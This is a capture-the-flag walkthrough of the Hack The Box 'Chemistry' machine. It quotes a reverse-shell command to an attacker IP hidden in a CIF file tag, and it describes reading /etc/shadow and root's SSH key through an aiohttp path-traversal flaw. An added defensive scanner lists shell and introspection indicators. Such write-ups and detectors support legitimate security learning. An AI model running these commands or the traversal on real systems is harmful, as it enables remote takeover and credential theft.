HTB | Chemistry
This is a Linux box. You can find it here.
Skills Learned
CIF exploit
CVE-2024-23334
IP: 10.129.30.124
After registering, we get a file upload option that accepts .cif files.
We can download example.cif to look at the syntax.
It is a CIF (Crystallographic Information File) format, which is commonly used in crystallography to describe the atomic structure of crystals. Here’s a breakdown of the data:
Cell Parameters:
These describe the dimensions of the unit cell (the repeating structure in the crystal lattice):
_cell_length_a: The length of the unit cell along the "a" axis (10.00000 Å).
_cell_length_b: The length of the unit cell along the "b" axis (10.00000 Å).
_cell_length_c: The length of the unit cell along the "c" axis (10.00000 Å).
_cell_angle_alpha: The angle between the "b" and "c" axes (90.00000 degrees).
_cell_angle_beta: The angle between the "a" and "c" axes (90.00000 degrees).
_cell_angle_gamma: The angle between the "a" and "b" axes (90.00000 degrees).
These parameters indicate that the unit cell is cubic (since all angles are 90 degrees and the lengths are equal).
Symmetry Information:
_symmetry_space_group_name_H-M 'P 1': This specifies the space group of the crystal. 'P 1' indicates the simplest space group, with no symmetry beyond translational symmetry. It is the most basic space group in crystallography, implying there are no additional symmetry operations like rotations or reflections.
Atomic Positions: The loop section defines the positions of atoms within the unit cell. The fractional coordinates (_fract_x, _fract_y, _fract_z) specify the position of each atom relative to the dimensions of the unit cell:
H (Hydrogen):
Coordinates: (0.00000, 0.00000, 0.00000) — at the origin of the unit cell.
Occupancy: 1 (fully occupied).
O (Oxygen):
Coordinates: (0.50000, 0.50000, 0.50000) — at the centre of the unit cell.
Occupancy: 1 (fully occupied).
Overall Explanation: This CIF file describes a crystal with a simple cubic unit cell, where a hydrogen atom is located at the origin and an oxygen atom is located at the centre of the unit cell. The space group "P 1" implies no symmetry beyond basic translation, meaning there are no mirror planes, rotations, or inversions in the crystal structure.
On googling the payload I found this GitHub repo. After some hit and trial, I found the reverse shell payload.
Edit example.cif and add the lines below:
The payload above is not part of standard crystallographic data; it is a Python-based shell command injection. Here's what is happening in this command:
Breakdown:
_space_group_magn.transform_BNS_Pp_abc: This CIF tag is abused for malicious purposes. Instead of a normal symmetry transformation, its data field carries Python code.
The Code:
The code looks for a specific class (BuiltinImporter) using Python's introspection capabilities. It then calls os.system to execute a shell command that opens a reverse shell connection to IP 10.10.14.46 on port 1234. The command sh -i >& /dev/tcp/10.10.14.46/1234 0>&1 is designed to establish a reverse shell (giving remote access to the system) to the specified IP and port.
Reverse Shell: If executed successfully, this command will attempt to open a reverse shell, which means the machine processing the CIF file will try to connect back to the attacker's machine at 10.10.14.46 on port 1234. This would provide the attacker with remote control over the machine running the CIF file.
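As an added defensive check, not part of this write-up or of the box, the following Python scanner flags CIF data items that carry code where a cell parameter or a symmetry transformation belongs. It assumes single-line data items; the transform allow-list, the indicator list and both sample files are constructed for the example.

```python
import re

# Single-line CIF data item: "_tag value", value bare, 'quoted' or "quoted".
# Multi-line ";" text fields are out of scope (an assumption of this example).
ITEM_RE = re.compile(r"""^\s*(_[\w.\-]+)\s+(?:'([^']*)'|"([^"]*)"|(\S+))\s*$""")

# Cell lengths/angles must be plain numbers, optionally with an esd "(n)".
NUMERIC_TAG = re.compile(r"^_cell_(length|angle)_")
NUMERIC_OK = re.compile(r"^[+-]?\d+(\.\d*)?(\(\d+\))?$")

# Transformation tags such as _space_group_magn.transform_BNS_Pp_abc hold
# symmetry operations like 'a,b,c;0,0,0': axis letters, digits and simple
# arithmetic only. Brackets, dots or underscores have no business there.
TRANSFORM_TAG = re.compile(r"transform", re.IGNORECASE)
TRANSFORM_OK = re.compile(r"^[abcxyzABCXYZ0-9+\-*/,;. ]+$")

# Python introspection / command-execution substrings. A payload can split
# these ("__sub" + "classes__"), so treat this as a second layer only.
CODE_INDICATORS = ("__class__", "__mro__", "__import__", "load_module",
                   "os.system", "subprocess", "/dev/tcp", "BuiltinImporter")


def scan_cif(text: str) -> list:
    """Return (tag, reason) findings; an empty list means nothing flagged."""
    findings = []
    for line in text.splitlines():
        m = ITEM_RE.match(line)
        if not m:
            continue
        tag = m.group(1)
        value = next(g for g in m.groups()[1:] if g is not None)
        if any(ind in value for ind in CODE_INDICATORS):
            findings.append((tag, "code indicator in value"))
        if NUMERIC_TAG.match(tag) and not NUMERIC_OK.match(value):
            findings.append((tag, "cell parameter is not numeric"))
        if TRANSFORM_TAG.search(tag) and not TRANSFORM_OK.match(value):
            findings.append((tag, "transform outside symmetry alphabet"))
    return findings


# Constructed samples: the benign header mirrors example.cif from the box; the
# second swaps the transform for Python-looking text (not a working payload).
BENIGN_CIF = """data_example
_cell_length_a 10.00000
_cell_angle_alpha 90.00000
_symmetry_space_group_name_H-M 'P 1'
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
"""
SUSPICIOUS_CIF = BENIGN_CIF.replace(
    "'a,b,c;0,0,0'", "'a,b,[c for c in ().__class__.__mro__];0,0,0'")
```

Running such a check on uploads before handing the file to a CIF parser rejects the transform-field abuse described above even when the indicator strings are obfuscated, because the allow-list, not the indicator list, does the rejecting.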
Start the nc listener first, then upload the file and click View.
We found user.txt, but we do not have permission to view it.
On looking around the server, we found a database.db file.
On further analysing database.db, we found password hashes for the users.
Found the password for Rosa via CrackStation.
Now we can view the user.txt
For further enumeration, we copy linpeas to the box and run it.
We found an internal service running on port 8080.
Let's forward port 8080 to port 8888 on our machine so that we can access it via localhost.
Running nmap against localhost:8888 shows aiohttp 3.9.1 running internally on port 8080.
On googling for an aiohttp 3.9.1 exploit, we found this GitHub repo with a PoC.
Let's copy this exploit to the box and run it.
It looks like we have to modify the script.
After making the necessary changes to the script, running it returns /etc/passwd.
To confirm whether we can read files that require root permissions, replace etc/passwd with etc/shadow in the script and run it again.
Now that we are sure the exploit works properly, we can get root.txt.
There are two methods:
1. Cat root.txt directly: change /etc/shadow to root/root.txt in the script and run it.
2. Get root's id_rsa and SSH in as root: run the script against root's key, copy the RSA private key it returns, SSH in as root, and grab root.txt.